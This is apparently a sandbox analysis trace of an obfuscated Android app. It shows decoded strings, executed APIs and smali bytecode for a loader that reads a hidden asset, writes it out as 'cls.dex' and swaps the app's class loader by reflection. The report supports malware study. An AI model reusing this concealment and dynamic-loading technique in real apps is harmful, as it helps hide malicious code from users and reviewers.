  • $2: 616E64726F69642E6170702E496E737472756D656E746174696F6E
NameTypeValue
Return Valuejava.lang.String
  • toString: android.app.Instrumentation
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1b810c63
  • $1: newApplication
  • $2: 6E65774170706C69636174696F6E
NameTypeValue
Return Valuejava.lang.String
  • toString: newApplication
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@19e3b919
  • $1: java.lang.Class
  • $2: 6A6176612E6C616E672E436C617373
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.Class
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1bedcdd5
  • $1: android.content.Context
  • $2: 616E64726F69642E636F6E74656E742E436F6E74657874
NameTypeValue
Return Valuejava.lang.String
  • toString: android.content.Context
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2f6bb3b7
  • $1: java.lang.ClassLoader
  • $2: 6A6176612E6C616E672E436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.ClassLoader
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@67f9c42
  • $1: loadClass
  • $2: 6C6F6164436C617373
NameTypeValue
Return Valuejava.lang.String
  • toString: loadClass
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@27f6e190
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@fa8719a
  • $1: getClassLoader
  • $2: 676574436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: getClassLoader
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@9e8f154
  • $1: com/czybg/eqtbdmzpklrgyns/MainApp
  • $2: 636F6D2F637A7962672F65717462646D7A706B6C7267796E732F4D61696E417070
NameTypeValue
Return Valuejava.lang.String
  • toString: com/czybg/eqtbdmzpklrgyns/MainApp
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e8dcec0
  • $1: getBaseContext
  • $2: 67657442617365436F6E74657874
NameTypeValue
Return Valuejava.lang.String
  • toString: getBaseContext
Method: ..:79 Show source
Method: ..:100 Show source
Method: ..:9 Show source
Method: ..:14 Show source
Method: ..:24 Show source
Method: ..:29 Show source
Method: ..:9 Show source
Method: ..:13 Show source
Method: ..:16 Show source
Method: ..:25 Show source
Method: ..:6 Show source
Method: ..:11 Show source
Method: ..:14 Show source
Method: ..:17 Show source
Method: ..:9 Show source
Method: ..:15 Show source
Method: ..:24 Show source
Method: ..:42 Show source
Method: ..:90 Show source
Method: ..:112 Show source
Method: ..:136 Show source
Method: ..:160 Show source
Method: ..:184 Show source
Method: ..:212 Show source
Method: ..:11 Show source
Method: ..:16 Show source
Method: com.czybg.eqtbdmzpklrgyns.wymvtEV.DiXsQ:7 Show source
Method: com.czybg.eqtbdmzpklrgyns.wymvtEV.DiXsQ:12 Show source
Method: com.czybg.eqtbdmzpklrgyns.wymvtEV.DiXsQ:63 Show source
Method: etxtfvw.cqwwrwk.uxONpX:9 Show source
Method: etxtfvw.cqwwrwk.uxONpX:14 Show source
Method: ..:8 Show source
Method: ..:13 Show source
Method: ..:17 Show source
Method: ..:22 Show source
Method: ..:9 Show source
Method: ..:14 Show source
Method: ..:6 Show source
Method: com.czybg.eqtbdmzpklrgyns.siQFgImL.hZyMGHgz:54 Show source
Method: ..:31 Show source
Method: ..:42 Show source
Method: ..:66 Show source
Method: ..:21 Show source
Method: ..:26 Show source
Method: ..:9 Show source
Method: ..:13 Show source
Method: ..:16 Show source
Method: ..:25 Show source
Method: ..:35 Show source
Method: ..:40 Show source
Method: ..:17 Show source
Method: ..:22 Show source
Method: ..:28 Show source
Method: ..:11 Show source
Method: ..:16 Show source
Method: ..:21 Show source
Method: ..:26 Show source
Method: ..:31 Show source
Method: ..:36 Show source
Method: ..:41 Show source
Method: ..:46 Show source
Method: ..:51 Show source
Method: ..:56 Show source
Method: ..:61 Show source
Method: ..:66 Show source
Method: ..:71 Show source
Method: ..:76 Show source
Method: ..:81 Show source
Method: ..:86 Show source
Method: ..:91 Show source
Method: ..:96 Show source
Method: ..:101 Show source
Method: ..:106 Show source
Method: ..:111 Show source
Method: ..:116 Show source
Method: ..:121 Show source
Method: ..:46 Show source
Method: ..:75 Show source
Method: ..:80 Show source
Method: ..:86 Show source
Method: ..:107 Show source
Method: ..:86 Show source
Method: ..:23 Show source
Method: ..:48 Show source
Method: ..:69 Show source
Method: ..:74 Show source
Method: ..:80 Show source
Method: ..:110 Show source
Method: ..:115 Show source
Method: ..:123 Show source
Method: ..:141 Show source
Method: ..:55 Show source
Method: ..:127 Show source
Method: ..:8 Show source
Method: ..:12 Show source
Method: ..:17 Show source
Method: ..:22 Show source
Method: ..:27 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:138 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:147 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:156 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:165 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:174 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:183 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:192 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:201 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:210 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:219 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:228 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:237 Show source
Method: com.czybg.eqtbdmzpklrgyns.hrYSUpo.<init>:246 Show source
Method: ..:22 Show source
Method: ..:7 Show source
Method: ..:14 Show source
Method: com.czybg.eqtbdmzpklrgyns.JEgpc.DiXsQ:37 Show source
Method: ..:172 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:45 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.DiXsQ:24 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.DiXsQ:28 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.DiXsQ:34 Show source
Method: ..:67 Show source
Method: ..:70 Show source
Method: ..:13 Show source
Method: ..:18 Show source
Method: ..:12 Show source
Method: ..:9 Show source
Method: ..:14 Show source
Method: ..:13 Show source
Method: ..:44 Show source
Method: ..:49 Show source
Method: ..:30 Show source
Method: ..:35 Show source
Method: ..:40 Show source
Method: ..:92 Show source
Method: ..:97 Show source
Method: ..:100 Show source
Method: ..:26 Show source
Method: ..:16 Show source
Method: ..:19 Show source
Method: ..:37 Show source
Method: ..:20 Show source
Method: ..:6 Show source
Method: ..:11 Show source
Method: ..:11 Show source
Method: ..:8 Show source
Method: ..:13 Show source
Method: ..:34 Show source
Method: ..:36 Show source
Method: ..:42 Show source
Method: ..:49 Show source
Method: ..:61 Show source
Method: ..:63 Show source
Method: ..:69 Show source
Method: ..:32 Show source
Method: ..:20 Show source
Method: ..:14 Show source
Method: ..:46 Show source
Method: com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ:17 Show source
Method: com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ:22 Show source
Method: com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ:35 Show source
Method: com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ:40 Show source
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:8 Show source
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:13 Show source
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:24 Show source
Method: etxtfvw.cqwwrwk.unFeJNljZsjaw:45 Show source
Method: ..:15 Show source
Method: ..:20 Show source
Method: ..:24 Show source
Method: ..:29 Show source
Method: ..:34 Show source
Method: ..:39 Show source
Method: ..:44 Show source
Method: ..:49 Show source
Method: ..:54 Show source
Method: ..:59 Show source
Method: ..:64 Show source
Method: ..:69 Show source
Method: ..:74 Show source
Method: ..:79 Show source
Method: ..:84 Show source
Method: ..:89 Show source
Method: ..:94 Show source
Method: ..:99 Show source
Method: ..:54 Show source
Method: ..:50 Show source
Method: ..:9 Show source
Method: ..:13 Show source
Method: ..:18 Show source
Method: ..:23 Show source
Method: ..:28 Show source
Method: ..:33 Show source
Method: ..:38 Show source
Method: ..:22 Show source
Method: ..:14 Show source
Method: ..:26 Show source
Method: ..:31 Show source
Method: ..:70 Show source
Method: ..:75 Show source
Method: ..:129 Show source
Method: ..:156 Show source
Method: ..:62 Show source
Method: ..:91 Show source
Method: ..:24 Show source
Method: ..:19 Show source
Method: ..:18 Show source
Method: ..:18 Show source
Method: ..:23 Show source
Method: ..:60 Show source
Method: ..:65 Show source
Method: ..:68 Show source
Method: ..:71 Show source
Method: ..:9 Show source
Method: ..:14 Show source
Method: ..:27 Show source
Method: ..:32 Show source
Method: ..:37 Show source
Method: ..:10 Show source
Method: ..:14 Show source
Method: ..:18 Show source
Method: ..:22 Show source
Method: ..:26 Show source
Method: ..:30 Show source
Method: ..:34 Show source
Method: ..:39 Show source
Method: ..:43 Show source
Method: ..:48 Show source
Method: ..:52 Show source
Method: ..:61 Show source
Method: ..:28 Show source
Method: ..:34 Show source
Method: ..:62 Show source
Method: ..:47 Show source
Method: ..:17 Show source
Method: ..:33 Show source
Method: ..:56 Show source
Method: ..:77 Show source
Method: ..:99 Show source
Method: ..:104 Show source
Method: ..:107 Show source
Method: ..:35 Show source
Method: ..:40 Show source
Method: ..:48 Show source
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.DiXsQ:52 Show source
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.DiXsQ:72 Show source
Method: ..:28 Show source
Method: ..:33 Show source
Method: ..:31 Show source
Method: ..:36 Show source
Method: ..:42 Show source
Method: ..:14 Show source
Method: ..:26 Show source
Method: ..:55 Show source
Method: ..:80 Show source
Method: ..:107 Show source
Method: ..:27 Show source
Method: ..:29 Show source
Method: ..:34 Show source
Method: ..:40 Show source
Method: ..:43 Show source
Method: ..:45 Show source
Method: ..:50 Show source
Method: ..:59 Show source
Method: ..:64 Show source
Method: ..:70 Show source
Method: ..:75 Show source
Method: ..:106 Show source
Method: ..:111 Show source
Method: ..:117 Show source
Method: ..:122 Show source
Method: ..:12 Show source
Method: ..:20 Show source
Method: com.czybg.eqtbdmzpklrgyns.HLqFdR.DiXsQ:36 Show source
Method: com.czybg.eqtbdmzpklrgyns.HLqFdR.DiXsQ:43 Show source
Method: ..:34 Show source
Method: ..:8 Show source
Method: ..:14 Show source
Method: ..:31 Show source
Method: ..:6 Show source
Method: ..:11 Show source
Method: ..:12 Show source
Method: ..:16 Show source
Method: ..:21 Show source
Method: com.czybg.eqtbdmzpklrgyns.EZmcnv.DiXsQ:8 Show source
Method: ..:43 Show source
Method: ..:16 Show source
Method: ..:15 Show source
Method: ..:10 Show source
Method: ..:15 Show source
Method: ..:19 Show source
Method: ..:24 Show source
Method: ..:28 Show source
Method: ..:33 Show source
Method: com.czybg.eqtbdmzpklrgyns.zlSgts.Odjrct:17 Show source
Method: com.czybg.eqtbdmzpklrgyns.zlSgts.Odjrct:20 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.LmcGi:24 Show source
Method: com.czybg.eqtbdmzpklrgyns.VvXSDk.LmcGi:29 Show source
Method: ..:10 Show source
Method: ..:15 Show source
Method: ..:18 Show source
Method: ..:30 Show source
Method: ..:35 Show source
Method: ..:24 Show source
Method: ..:42 Show source
Method: ..:69 Show source
Method: ..:95 Show source
Method: ..:11 Show source
Method: ..:18 Show source
Method: ..:22 Show source
Method: ..:28 Show source
Method: ..:68 Show source
Method: ..:82 Show source
Method: ..:25 Show source
Method: ..:51 Show source
Method: ..:69 Show source
Method: ..:8 Show source
Method: ..:13 Show source
Method: ..:34 Show source
Method: ..:39 Show source
Method: ..:45 Show source
Method: ..:64 Show source
Method: ..:69 Show source
Method: ..:72 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:15 Show source
Method: ..:20 Show source
Method: ..:23 Show source
Method: com.czybg.eqtbdmzpklrgyns.QsRifJa.DiXsQ:227 Show source
Method: com.czybg.eqtbdmzpklrgyns.QsRifJa.DiXsQ:331 Show source
Method: com.czybg.eqtbdmzpklrgyns.WDAcpd.LmcGi:116 Show source
Method: ..:21 Show source
Method: ..:26 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:18 Show source
Method: ..:11 Show source
Method: ..:16 Show source
Method: ..:19 Show source
Method: ..:24 Show source
Method: ..:29 Show source
Method: ..:34 Show source
Method: ..:39 Show source
Method: ..:44 Show source
Method: ..:49 Show source
Method: ..:54 Show source
Method: ..:25 Show source
Method: ..:30 Show source
Method: ..:36 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:153 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:183 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:210 Show source
Method: etxtfvw.cqwwrwk.YRkFJMV:220 Show source
Method: ..:7 Show source
Method: ..:12 Show source
Method: ..:27 Show source
Method: ..:56 Show source
Method: ..:12 Show source
Method: ..:15 Show source
Method: ..:38 Show source
Method: ..:43 Show source
Method: ..:46 Show source
Method: ..:67 Show source
Method: ..:72 Show source
Method: ..:75 Show source
Method: ..:15 Show source
Method: ..:23 Show source
Method: ..:23 Show source
Method: ..:31 Show source
Method: ..:51 Show source
Method: ..:55 Show source
Method: ..:19 Show source
Method: ..:67 Show source
Method: ..:95 Show source
Method: ..:6 Show source
Method: ..:9 Show source
Method: ..:14 Show source
Method: ..:17 Show source
Method: ..:20 Show source
Method: com.czybg.eqtbdmzpklrgyns.ciatqPxI.<init>:10 Show source
Method: com.czybg.eqtbdmzpklrgyns.ciatqPxI.<init>:15 Show source
Method: ..:12 Show source
Method: ..:17 Show source
Method: ..:25 Show source
Method: ..:30 Show source
Method: ..:11 Show source
Method: com.czybg.eqtbdmzpklrgyns.dclBIK.DiXsQ:7 Show source
Method: com.czybg.eqtbdmzpklrgyns.dclBIK.DiXsQ:12 Show source
Method: com.czybg.eqtbdmzpklrgyns.NvHUu.DiXsQ:16 Show source
Method: com.czybg.eqtbdmzpklrgyns.NvHUu.DiXsQ:21 Show source
Method: ..:11 Show source
Method: com.czybg.eqtbdmzpklrgyns.UBLcF.onPostExecute:72 Show source
Method: ..:23 Show source
Method: ..:85 Show source
Method: com.czybg.eqtbdmzpklrgyns.MfOxe.DiXsQ:10 Show source
Method: com.czybg.eqtbdmzpklrgyns.MfOxe.DiXsQ:15 Show source
Method: com.czybg.eqtbdmzpklrgyns.MfOxe.DiXsQ:19 Show source
Method: com.czybg.eqtbdmzpklrgyns.MfOxe.DiXsQ:97 Show source
Method: ..:7 Show source
Method: ..:11 Show source
Method: ..:17 Show source
Method: ..:19 Show source
Method: ..:87 Show source
Method: ..:12 Show source
Method: ..:17 Show source
Method: ..:79 Show source
Method: ..:84 Show source
Method: ..:134 Show source
Method: ..:139 Show source
Method: ..:196 Show source
Method: ..:201 Show source
Method: ..:28 Show source
Method: ..:33 Show source
Method: ..:39 Show source
Method: ..:81 Show source
Method: ..:86 Show source
Method: ..:92 Show source
Method: ..:105 Show source
Method: ..:110 Show source
Method: ..:42 Show source
Method: ..:65 Show source
Method: ..:40 Show source
Method: ..:45 Show source
Method: ..:26 Show source
Method: ..:5 Show source
Method: ..:10 Show source
Method: ..:25 Show source
Method: ..:30 Show source
Method: ..:33 Show source
Method: ..:46 Show source
Method: ..:51 Show source
Method: com.czybg.eqtbdmzpklrgyns.uKHWhZbq.DiXsQ:8 Show source
Method: com.czybg.eqtbdmzpklrgyns.uKHWhZbq.DiXsQ:13 Show source
Method: ..:1 Show source
Method: com.czybg.eqtbdmzpklrgyns.HLqFdR.DiXsQ:3 Show source
Method: ..:3 Show source
Method: ..:3 Show source
Method: etxtfvw.cqwwrwk.BROqnOXwFKWnWc:8 Show source
NameTypeValue
p0java.lang.String
  • toString: MD5
NameTypeValue
Return Valuejava.security.MessageDigest$MessageDigestImpl
  • toString: MESSAGE DIGEST MD5

27 Executed Methods

APIs
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • etxtfvw.cqwwrwk.getAssets
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • android.content.res.AssetManager.open
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • android.content.res.AssetManager$AssetInputStream.available
  • java.lang.Integer.intValue
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getConstructor
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • etxtfvw.cqwwrwk.getFilesDir
  • java.lang.StringBuilder.append
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getField
  • java.lang.StringBuilder.append
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.io.File.createNewFile
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • android.content.res.AssetManager$AssetInputStream.read
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • android.content.res.AssetManager$AssetInputStream.close
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • etxtfvw.cqwwrwk.CNLldGq
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getConstructor
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getConstructor
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getConstructor
  • java.lang.reflect.Constructor.newInstance
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getConstructor
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.reflect.Constructor.newInstance
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • etxtfvw.cqwwrwk.getClassLoader
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.io.FileOutputStream.write
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.io.FileOutputStream.close
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Class.getSuperclass
  • java.lang.reflect.Field.setAccessible
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.io.File.getAbsolutePath
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.io.File.getParentFile
  • java.io.File.getParent
  • etxtfvw.cqwwrwk.getClassLoader
  • etxtfvw.cqwwrwk.uxONpX
  • java.lang.Object.getClass
  • java.lang.Class.getSuperclass
  • java.lang.reflect.Field.setAccessible
  • java.lang.Object.getClass
  • java.lang.reflect.Field.setAccessible
  • java.lang.Object.getClass
  • java.lang.reflect.Field.setAccessible
  • java.lang.reflect.Field.get
  • etxtfvw.cqwwrwk.getPackageName
  • java.util.Map.get
  • java.lang.ref.WeakReference.get
  • java.lang.Object.getClass
  • java.lang.Class.getDeclaredField
  • java.lang.reflect.Field.setAccessible
  • java.lang.reflect.Field.set
Strings
  • Ah8TBR0eD00SGBkGEgUXXwUSAVkqEAISAz8WBQIWEgU=
  • android.content.res.AssetManager
  • DAESGQ==
  • CRABFlwbCg0WWSQGBQINFg==
  • java.lang.String
  • open
  • BBQDNgEEDhcC
  • getAssets
  • NjwmBSY4PBIcOzE=
  • AgcWHh4WCQ8U
  • available
  • CRABFlweBE03HhsX
  • java.io.File
  • BBQDMRsbDhA1HgU=
  • getFilesDir
  • EBQHFgAWHwwD
  • /
  • AB0EWRYSEw==
  • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
  • AAMSFgYSJQYGMR4eEg==
  • createNewFile
  • ERQWEw==
  • ODM=
  • [B
  • read
  • AB0YBBc=
  • close
  • ID87GxYwGg==
  • CNLldGq
  • CRABFlweBE03HhsXOB4XAQIDIQMZBhAa
  • java.io.FileOutputStream
  • CRABFlwCHwodWQ0bB0U5GAc4BwMbFgUkAwASCg4=
  • CRABFlweBE0zAhEUEhkGFTgCBgceFyIDBRcWBg==
  • CRABFlwCHwodWQ0bB0U5GAcyHAMZGg==
  • AB0WBAESGE0VEg8=
  • EwQDORcPHyYfAwUL
  • FAMeAxc=
  • ExAFEhwD
  • parent
  • write
  • BBQDNhAEBA8EAxIiFh8L
  • getAbsolutePath
  • BBQDJxMFDg0FMR4eEg==
  • getParentFile
  • BBQDJxMFDg0F
  • getParent
  • /data/data/com.czybg.eqtbdmzpklrgyns
  • mBase
  • mMainThread
  • mPackages
  • com.czybg.eqtbdmzpklrgyns
  • mClassLoader
Position Instruction Meta Information
0.prologue
1try_start_0:
2const-string v26, "Ah8TBR0eD00SGBkGEgUXXwUSAVkqEAISAz8WBQIWEgU="
3move-object/from16 v0, p0
4move-object/from16 v1, v26
6invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
7move-result-object v26
9invoke-static/range {v26 .. v26}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 43908
    • p0: android.content.res.AssetManager
    • Return:
      • class android.content.res.AssetManager
      • getName: android.content.res.AssetManager
10move-result-object v26
12const-string v27, "DAESGQ=="
13move-object/from16 v0, p0
14move-object/from16 v1, v27
16invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
17move-result-object v27
18const/16 v28, 0x1
19move/from16 v0, v28
20new-array v0, v0, [Ljava/lang/Class;
21move-object/from16 v28, v0
22const/16 v29, 0x0
24const-string v30, "CRABFlwbCg0WWSQGBQINFg=="
25move-object/from16 v0, p0
26move-object/from16 v1, v30
28invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
29move-result-object v30
31invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 43949
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
32move-result-object v30
33aput-object v30, v28, v29
35invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 43964
    • This:
      • class android.content.res.AssetManager
      • getName:android.content.res.AssetManager
    • p0: open
    • p1: [Ljava.lang.Class;@10ff9e18
    • p1.Arrays.toString: [class java.lang.String]
    • Return:
      • public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
      • getName: open
36move-result-object v26
38invoke-virtual/range {p0 .. p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
39move-result-object v27
41const-string v28, "BBQDNgEEDhcC"
42move-object/from16 v0, p0
43move-object/from16 v1, v28
45invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
46move-result-object v28
47const/16 v29, 0x0
48move/from16 v0, v29
49new-array v0, v0, [Ljava/lang/Class;
50move-object/from16 v29, v0
52invoke-virtual/range {v27 .. v29}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 43984
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: getAssets
    • p1: [Ljava.lang.Class;@342202ad
    • Return:
      • public android.content.res.AssetManager android.content.ContextWrapper.getAssets()
      • getName: getAssets
53move-result-object v27
54const/16 v28, 0x0
55move/from16 v0, v28
56new-array v0, v0, [Ljava/lang/Object;
57move-object/from16 v28, v0
58move-object/from16 v0, v27
59move-object/from16 v1, p0
60move-object/from16 v2, v28
62invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.getAssets
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • android.content.res.AssetManager@b801830
  • Time: 43994
    • This:
      • public android.content.res.AssetManager android.content.ContextWrapper.getAssets()
      • getName:getAssets
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@36e54173
    • Return:
      • android.content.res.AssetManager@b801830
63move-result-object v27
64const/16 v28, 0x1
65move/from16 v0, v28
66new-array v0, v0, [Ljava/lang/Object;
67move-object/from16 v28, v0
68const/16 v29, 0x0
70const-string v30, "NjwmBSY4PBIcOzE="
71move-object/from16 v0, p0
72move-object/from16 v1, v30
74invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
75move-result-object v30
76aput-object v30, v28, v29
78invoke-virtual/range {v26 .. v28}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.content.res.AssetManager.open
    • This:
      • android.content.res.AssetManager@b801830
    • fileName: UMQrTOWqmLF
    • Return:
      • android.content.res.AssetManager$AssetInputStream@29c881cf
  • Time: 44005
    • This:
      • public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
      • getName:open
    • p0: android.content.res.AssetManager@b801830
    • p1: [Ljava.lang.Object;@1706875c
    • p1.Arrays.toString: [UMQrTOWqmLF]
    • Return:
      • android.content.res.AssetManager$AssetInputStream@29c881cf
79move-result-object v16
81invoke-virtual/range {v16 .. v16}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
82move-result-object v26
84const-string v27, "AgcWHh4WCQ8U"
85move-object/from16 v0, p0
86move-object/from16 v1, v27
88invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
89move-result-object v27
90const/16 v28, 0x0
91move/from16 v0, v28
92new-array v0, v0, [Ljava/lang/Class;
93move-object/from16 v28, v0
95invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44034
    • This:
      • class android.content.res.AssetManager$AssetInputStream
      • getName:android.content.res.AssetManager$AssetInputStream
    • p0: available
    • p1: [Ljava.lang.Class;@3526b7e1
    • Return:
      • public final int android.content.res.AssetManager$AssetInputStream.available() throws java.io.IOException
      • getName: available
96move-result-object v26
97const/16 v27, 0x0
98move/from16 v0, v27
99new-array v0, v0, [Ljava/lang/Object;
100move-object/from16 v27, v0
101move-object/from16 v0, v26
102move-object/from16 v1, v16
103move-object/from16 v2, v27
105invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.content.res.AssetManager$AssetInputStream.available
    • This:
      • android.content.res.AssetManager$AssetInputStream@29c881cf
    • Return:
      • 581760
  • Time: 44058
    • This:
      • public final int android.content.res.AssetManager$AssetInputStream.available() throws java.io.IOException
      • getName:available
    • p0: android.content.res.AssetManager$AssetInputStream@29c881cf
